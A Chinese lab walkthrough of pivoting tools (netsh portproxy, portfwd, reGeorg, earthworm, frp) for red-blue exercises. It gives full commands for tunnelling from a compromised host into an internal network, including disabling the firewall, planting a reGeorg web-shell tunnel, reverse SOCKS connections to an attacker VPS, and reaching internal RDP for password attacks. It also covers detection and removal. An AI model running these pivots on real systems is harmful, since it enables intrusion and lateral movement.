攻防演练中内网代理常用工具总结

  • 攻防演练中内网代理常用工具总结已关闭评论
  • 9 views
  • A+
所属分类:安全文章

1 场景介绍

一个网络请求一般是由客户端发起,服务器响应,而代理服务是这个网络请求的中介,其作用是将客户端的网络请求经由自身代理服务转发至服务端

某些情况下客户端无法直接访问服务端,但代理服务端可以访问服务端,此时客户端与代理服务端建立协议,客户端的请求都经由代理端转发至服务端这便是正向代理。正向代理主要面向客户端服务,服务端的响应会返回给代理服务端,代理服务端会将其转发至客户端。故而正向代理的过程中,服务端无法确定请求的真实发起者,仅与代理端进行通信。

1617153384_6063cd68d8e44c26f3e06.png?1617153386695

某些情况下,为保护内网安全以及优化网站负载服务端也会使用代理程序代理大量来自客户端的网络请求,反向代理主要面向服务端服务,客户端的请求会直接发给代理服务器,代理服务器会转发至服务端并将服务端响应返回值客户端。故而反向代理的过程中,客户端无法确定真实服务端地址,仅与代理端进行通信。

1617153396_6063cd741a2cba82de7b5.png?1617153397726

攻击者在成功入侵某一台对外服务器后也会利用以上代理原理进行内网横向渗透进一步扩大战果,上传代理工具至对外服务器将其改造为跳板机,建立通往内网的通信隧道。

某些不合规情况下运维人员为方便自身,擅自将内网服务器代理至互联网也会造成安全风险。

通过内网代理环境应急演练熟悉当前常用内网代理工具和方法以及检查和处置方法,提升内部人员安全意识,避免因黑客攻击或运维不合规造成内网服务器暴露在公网的风险。

2 正向代理

2.1 netsh端口转发

netsh是windows系统自带命令行程序,攻击者无需上传第三方工具即可利用netsh程序可进行端口转发操作,可将内网中其他服务器的端口转发至本地访问,如内网某台服务器的ssh端口可转发至本地即可通过暴力破解或弱口令方式尝试登陆目标服务器。

注意点:

  1. 利用netsh进行端口转发需要具备管理员权限。
  2. 实际环境下攻击者利用靶机的漏洞上传该工具,本示例目的为演示代理工具的使用和原理,未体现漏洞利用过程。

场景:

靶机A是web服务器,攻击者通过漏洞攻击获得靶机A的服务器权限,靶机B位于内网且未映射至互联网,此时通过利用靶机A自带命令行程序netsh,netsh可将攻击者的流量经由靶机A转发至靶机B,使得攻击者可以访问到位于内网的靶机B。

示例

靶机A 10.211.55.3(windows)

靶机B 10.211.55.7(centos7)

攻击机 10.211.55.4(kali)

在靶机A上运行以下命令开启端口转发策略,提示需管理员权限运行:

netsh interface portproxy add v4tov4 listenaddress=10.211.55.3  listenport=33310 connectport=22 connectaddress=10.211.55.7

1617153415_6063cd87c807545fb01d7.png?1617153415974

使用如下如下命令切换至管理员权限,需输入管理员账号密码。

runas /user:administrator cmd

1617153431_6063cd97e6d331783162f.png?1617153432149

切换至管理员权限后重复上述命令。

在攻击机上运行如下命令登录靶机B失败。

ssh [email protected]-p 33310

在靶机A上运行如下命令查看防火墙状态,靶机A防火墙默认开启。

1617153458_6063cdb289676032456aa.png?1617153458777

netsh firewall show config

1617153469_6063cdbd67d0ea84fb5f6.png?1617153469548

使用netsh关闭靶机A的防火墙

netsh advfirewall set allprofiles state off

1617153483_6063cdcb95b3508ced029.png?1617153483863

在攻击机上运行如下命令利用靶机A的端口转发策略登录至靶机B上。

ssh [email protected]-p 33310

1617153494_6063cdd615f9b9dd9e1a1.png?1617153495945

在靶机B上看到开启了33310监听端口,同时攻击机与该端口建立了tcp连接,也可以看到靶机A主动连接了靶机B的22端口。说明此刻攻击机正在利用靶机A的端口转发隧道入侵靶机B。

1617153506_6063cde22976dcd5bb462.png?1617153508032

netsh端口转发可使用如下命令查看,确认主机是否被恶意植入了端口转发策略。

netsh interface portproxy show v4tov4

1617153516_6063cdec2540eb93a5330.png?1617153516345

使用如下命令即可删除端口转发策略

netsh interface portproxy delete v4tov4 listenaddress=10.211.55.3  listenport=33310

1617153525_6063cdf59ca8cf3a92ab8.png?1617153525849

2.2 portfwd端口转发

portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4以及IPV6的端口转发。

攻击者在获取对外服务器权限后为扩大战果,会上传端口转发工具至对外服务器,获得更多的可攻击面。例如将失陷主机的任意可访问端口转发至内网某台服务器的远程桌面端口,即可通过暴力破解和弱口令的方式尝试登陆内网服务器。

注意点:

实际环境下攻击者利用靶机的漏洞上传该工具,本示例目的为演示代理工具的使用和原理,未体现漏洞利用过程。

场景:

靶机A是web服务器,攻击者通过漏洞攻击获得靶机A的服务器权限,靶机B位于内网且未映射至互联网,此时通过上传portfwd至靶机A,portfwd可将攻击者的流量经由靶机A转发至靶机B,使得攻击者可以访问到位于内网的靶机B。

示例

靶机A 10.211.55.7

靶机B 10.211.55.3

攻击机 10.211.55.4

工具下载路径https://github.com/rssnsj/portfwd.git

在靶机A上使用如下命令下载portfwd端口转发工具。

git clone https://github.com/rssnsj/portfwd.git

1617153542_6063ce0624c92f5cd4470.png?1617153542336

使用如下命令进入src目录并进行编译,该工具包为源码需自行编译使用。

cd portfwd/src

make

1617153554_6063ce12807c1ff2db250.png?1617153554723

使用如下命令建立软链接,链接路径需为portfwd工具的绝对路径。

ln -s /root/portfwd/src/tcpfwd /usr/bin&&ln -s /root/portfwd/src/udpfwd /usr/bin

1617153564_6063ce1c1fc6b77677b97.png?1617153564352

使用如下命令进行端口转发,将发给靶机A的33310端口的流量转发至靶机B的3389端口,这样即使攻击机与靶机B的网络不通,仍可通过此端口转发链路访问到靶机B的3389端口。

tcpfwd 0.0.0.0:33310 10.211.55.3:3389

1617153574_6063ce26933402e450a12.png?1617153574797

在攻击机上运行如下命令即可通过端口转发访问靶机B的远程桌面。

rdesktop 10.211.55.7:33310

1617153584_6063ce30b4f98c22c69ed.png?1617153587296

1617153599_6063ce3f24e97e91b6a94.png?1617153602036

在靶机A上运行如下命令可查看到tcpfwd开启了一个监听端口33310,同时利用该端口转发隧道访问了靶机B的3389端口。

netstat -antlp

1617153613_6063ce4d8287ce8a91700.png?1617153614156

通过如下命令可以确定进程的可执行文件所在位置,并进行清除。

ls -al /proc/pid

1617153623_6063ce57933859f1d1fd4.png?1617153625485

在靶机B上运行如下命令可以看到靶机A与自身的远程桌面3389端口建立了tcp连接。

netstat -ano

1617153634_6063ce626bea01938cff5.png?1617153635121

2.3 regeorg正向代理

regeorg工具通过http协议建立通信隧道,攻击者通常在获得内网某台web服务器权限后,上传该工具创建socket监听一个端口用于正向代理,攻击者通过此端口可将攻击流量透传至目标内网其他服务器,从而达到内网横向渗透扩大战果的目的。

注意点:

实际环境下攻击者利用靶机的漏洞上传该工具,本示例目的为演示代理工具的使用和原理,未体现漏洞利用过程。

场景:

在靶机A上上传regeorg后门文件,在攻击机上运行regeorg脚本连接后门,使得本地攻击流量可通过此http隧道转发至内网环境。

示例 利用regeorg工具正向代理进行内网横向渗透

攻击机:10.211.55.5(kali)

靶机A:10.211.55.7(centos7+tomcat)

靶机B:10.211.55.15(windows server2003)

工具下载:

在攻击机上执行如下命令下载regeorg代理工具包

git clone https://github.com/sensepost/reGeorg.git

1617153722_6063ceba3e746e6e3504d.png?1617153722630

在靶机A上上传regeorg代理工具包如下:(实际攻击场景下通过利用靶机A的漏洞上传此工具包)

1617153740_6063cecc1d2eaf12dc6ed.png?1617153740274

在攻击机上运行代理脚本,由于靶机A使用的是jsp类型网站脚本,命令如下:

python reGeorgSocksProxy.py -u http://10.211.55.7:8080/reGeorg-master/tunnel.jsp -p 1088

提示georg says, ‘all seems fine’说明连接成功,已完成端口复用。

1617153749_6063ced5b919f308fd74d.png?1617153750106

在攻击机上配置本地全局代理proxychains,使得本地攻击流量可通过regeorg创建的http隧道转发至内网其他服务器。

攻击机自带proxychains全局代理工具,默认路径为/etc/proxychains4.conf,编辑配置文件在文件最后增加如下配置:

Socks5 127.0.0.1 1088

1617153758_6063cede52357e60dd308.png?1617153758603

以上配置使得攻击机可将支持socks5协议的攻击流量通过本地1088端口转发至靶机A,再通过靶机A转发至内网其他服务器。

1617153774_6063ceee028e3992cda4a.png?1617153774230

查看攻击机上的regeorg的运行日志可以看到,telnet请求的目的地址和端口。

1617153878_6063cf56b7684009909a1.png?1617153879029

查看靶机A上的网络连接,可以看到攻击机的请求成功实现端口复用,复用了java进程创建的端口连接了靶机B的445端口。

1617153902_6063cf6e93be22d5567e6.png?1617153903159

查看靶机B的网络连接无法看到攻击机ip地址,靶机A作为攻击机的正向代理

1617153914_6063cf7a384baafc081bf.png?1617153915419

下面使用端口扫描工具对靶机B进行端口扫描,命令如下:

proxychains4 namp -sT 10.211.55.15 -Pn

1617153928_6063cf88b0b89e526beee.png?1617153930784

成功扫描出靶机B开放的端口。

1617153937_6063cf91b44def01762a3.png?1617153938325

在靶机B上抓包可以看到所有的端口扫描请求源地址均来自靶机A而不是攻击机。

1617153950_6063cf9e3f7dc51d82987.png?1617153950858

regeorg代理工具是基于web程序实现的,其可执行文件一般位于网站路径下,可通过上传web后门查杀工具进行本地查杀。

上传web后门查杀工具后执行如下命令指定查杀路径,可以发现网站路径下攻击者不仅上传了regeorg代理工具同时也被植入了web后门文件。根据其扫描结果与网站开发核实后进行清除,同时可检查同路径下有无创建时间相同的脚本文件并与开发核实防止web后门查杀工具存在漏报误报情况。

./hm scan /usr/local/tomcat/tomcat/apache-tomcat-8.5.51/webapps/

1617153966_6063cfae76e763377e7f4.png?1617153967239

3 反向代理

3.1 earthworm反向代理

earthworm是一套便携式网络穿透工具,具有socks和端口转发两大核心功能,支持正向代理、反向代理、多级代理等方式打通网络隧道,可在复杂网络环境下完成网络穿透和内网横向渗透的功能。

注意点:

实际环境下攻击者利用靶机的漏洞上传该工具,本示例目的为演示代理工具的使用和原理,未体现漏洞利用过程。

场景:

分别在靶机A、B以及攻击机上运行earthworm代理工具,使得攻击机将靶机A、B作为其多级代理进行内网横向渗透。

1617153991_6063cfc7116e5c3e4ccf8.png?1617153993027

示例1 利用earthworm反向代理进行内网横向渗透

靶机A:10.211.55.7(centos7)

靶机B:10.211.55.15(windows server 2003r2)

攻击机:10.211.55.4(kali)

工具下载路径如下:

git clone https://github.com/idlefire/ew.git

使用上述命令在攻击机上下载该工具如下:

1617154006_6063cfd6605bd1d1330bd.png?1617154006872

下载成功后运行如下命令,可在攻击机本地开启1080和8888监听端口,并将1080端口收到的流量转发至8888端口。

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

1617154015_6063cfdf520d94229fc06.png?1617154015663

使用命令netstat -antlp 可以看到攻击机本地开启了1080和8888监听端口。

1617154023_6063cfe76f8b17cda4b35.png?1617154023864

在靶机A上上传earthworm,并运行如下命令连接攻击机的8888端口,建立与攻击机的反向代理。

./ew -s rssocks -d vpsip -e 8888

运行后可以看到程序日志提示已完成代理的连接。

1617154033_6063cff12967643eb3d63.png?1617154033664

在攻击机上修改全局代理软件proxychains的配置文件,默认路径为/etc/proxychains4.conf,配置socks5代理地址和端口如下:

1617154042_6063cffae0449ea2505e8.png?1617154043329

注意:

由于演练环境为本地搭建,实际环境下攻击机地址一般为公网vps地址,若设置为公网vps地址,此时全局代理配置ip应设置为vps地址。

在攻击机上使用如下命令通过代理隧道探测靶机B的3389端口是否开启,telnet使用的是tcp协议,而socks5协议支持tcp和udp协议数据的传递。

proxychains telnet 10.211.55.15 3389

1617154051_6063d00393d0fc3b8e5e4.png?1617154051725

在靶机A的earthworm日志上可以看到攻击机发起的telnet请求触发的tcp数据包成功转发至靶机B上。

1617154062_6063d00e10beed09e5406.png?1617154062350

在靶机A上查看网络连接可以看到靶机A与攻击机的8888端口建立了tcp连接,同时也可看到靶机A成功代理了攻击机触发的3389请求。

1617154071_6063d017bc9868f42ac57.png?1617154072313

在靶机B上只能看到靶机A的地址与自身3389端口建立了连接,无法看到攻击机地址。

1617154084_6063d0242dda397f10662.png?1617154085106

此时利用全局代理以及靶机A的代理隧道,即使靶机B处于内网无法通过外网访问,也可通过此代理隧道实现远程登录靶机B,实现内网的横向移动。

使用如下命令远程登录靶机B:

proxychains4 resktop 10.211.55.15

1617154094_6063d02e9428cdf1d8dc7.png?1617154096577

攻击机弹出了靶机B的远程桌面端口,此时若靶机B使用了弱密码或被暴力破解成功即可实现远程登录。

1617154103_6063d037ebed725986031.png?1617154104477

示例2 使用earthworm多级代理进行内网横向渗透

靶机A:10.211.55.7(centos7)

靶机B:10.211.55.15(windows server 2003r2)

靶机C:10.211.55.3(windows10)

攻击机:10.211.55.4(kali)

本示例中靶机A可访问攻击机,靶机B和C均与攻击机网络不通,但与靶机A网络互通。

注意:

某些条件下,内网某些服务器无法访问互联网,需通过级联的方式将可访问互联网的主机作为一级代理连接攻击机,二级代理连接一级代理主机即可形成通信隧道,攻击机可通过级联的方式将攻击流量转发至更深入的内网。

在攻击机上运行如下命令,可在攻击机本地开启1080和8888监听端口,并将1080端口收到的流量转发至8888端口。

./ew -s lcx_listen -l 1080 -e 8888

1617154113_6063d04162ea2cb1274c0.png?1617154113681

在靶机B上运行如下命令,可开启9999端口的正向代理。

./ew -s ssocksd -l 9999

1617154123_6063d04b7cc3610478782.png?1617154123712

在靶机A上运行如下命令,同时连接攻击机的反向代理端口和靶机B的正向代理端口。

./ew -s lcx_slave -d 10.211.55.4 -e 8888 -f 10.211.55.15 -g 9999

1617154133_6063d05583fcf2afc6e54.png?1617154133748

当靶机A成功连接上攻击机时,攻击机代理日志可以看到连接成功记录。

1617154140_6063d05cc6f5deebfe113.png?1617154141206

在攻击机上使用如下命令通过代理隧道探测靶机C的3389端口是否开启,telnet使用的是tcp协议,而socks5协议支持tcp和udp协议数据的传递。

proxychains telnet 10.211.55.3 3389

1617154150_6063d066961fdb4c4bea8.png?1617154150849

此时登录靶机C查看网络连接可以看到telnet请求触发的tcp连接发起端为靶机B。说明攻击机发起的请求经由靶机A转发至靶机B,有经由靶机B的正向代理转发至靶机C。

使用如下命令远程登录靶机C:

1617154169_6063d07952a064c6a7506.png?1617154170513

proxychains4 resktop 10.211.55.3

1617154178_6063d082eb42edafdb97c.png?1617154180853

攻击机弹出了靶机B的远程桌面端口,此时若靶机B使用了弱密码或被暴力破解成功即可实现远程登录。

1617154189_6063d08d343c1a8389f0d.png?1617154191708

3.2 frp反向代理

frp 是一个可用于内网穿透的高性能的反向代理应用,支持tcp、udp协议。运维人员使用 frp 进行反向代理,满足通过公网服务器访问处于内网的服务,如访问内网web服务,远程ssh内网服务器,远程控制内网nas等,但此类操作存在较大安全隐患,会将内网服务直接暴露在公网。

对于内网渗透来讲,这种功能恰好能够满足我们进行内网渗透的流量转发。frp最大的一个特点是使用socks代理,而socks是加密通信的,类似于做了一个加密的隧道,可以把外网的流量,通过加密隧道穿透到内网。

注意点:

实际环境下攻击者利用靶机的漏洞上传该工具,本示例目的为演示代理工具的使用和原理,未体现漏洞利用过程。

场景:

分别在靶机A和攻击机上运行frp代理工具,使得攻击机将靶机A作为其代理进行内网横向渗透。

示例 利用frp反向代理进行内网横向渗透

靶机A:10.211.55.7(centos7)

靶机B:10.211.55.3(windows)

攻击机:10.211.55.4(kali)

工具下载路径如下:

https://github.com/fatedier/frp/releases

根据运行系统选择合适版本下载,本示例运行平台均为linux,选择frp_0.35.1_linux_amd64.tar.gz进行下载。

在攻击机上编辑frp服务端配置文件frps.ini,配置内容如下:

[common]

bind_port = 33310

allow_ports=33310-33410

token = ZUcviGVBciVNip4YoeE0

在攻击机上进入到frp目录,运行如下命令启动代理程序服务端。

./frps -c frps.ini             #nohup ./frps -c frps.ini&后台运行

1617154231_6063d0b787cc7f7c250d4.png?1617154231952

在靶机A上上传frp工具包后,编辑frp客户端配置文件frpc.ini,配置内容如下:

[common]

server_addr = 10.211.55.4

server_port = 33310

token = ZUcviGVBciVNip4YoeE0

[socks_proxy]

type= tcp

plugin= socks5

remote_port = 33311

local_port = 33311

1617154298_6063d0fa085f63d6a6f6e.png?1617154298719

进入靶机A的frp目录下,运行如下命令即可启动反向代理客户端。

1617154309_6063d1058be6073502b2d.png?1617154309752

在攻击机上修改全局代理软件proxychains的配置文件,默认路径为/etc/proxychains4.conf,配置socks5代理地址和端口如下:

socks5 127.0.0.1 33311

1617154321_6063d11182235af9aa411.png?1617154321653

注意:

由于演练环境为本地搭建,实际环境下攻击机地址一般为公网vps地址,若设置为公网vps地址,此时全局代理配置ip应设置为vps地址。

在攻击机上使用如下命令通过代理隧道探测靶机B的3389端口是否开启,telnet使用的是tcp协议,而socks5协议支持tcp和udp协议数据的传递。

1617154336_6063d12006454f0fc466d.png?1617154336436

登录靶机B可以看到攻击机telnet触发的请求经由靶机A的代理隧道转发至靶机B。

使用如下命令远程登录靶机B:

1617154347_6063d12b47435f8e198fe.png?1617154348073

proxychains4 resktop 10.211.55.3

攻击机弹出了靶机B的远程桌面端口,此时若靶机B使用了弱密码或被暴力破解成功即可实现远程登录。

1617154363_6063d13b7fddfc47396f2.png?1617154365685

 

信息源于:freebuf-wiki

相关推荐: 蓝队的自我修养之事中监控 | HVV经验分享

1背景一年一度的重保活动在即,作为防守方将进行 7*24h 的值守安全设备,防守方主要从“事前排查”、“事中监控”、“事后溯源”三个维度开展自己的工作。“事前排查”主要是针对组织资产信息进行深度了解,掌握隐形资产,发现明显风险点并修复;“事中监控”也就是监控安…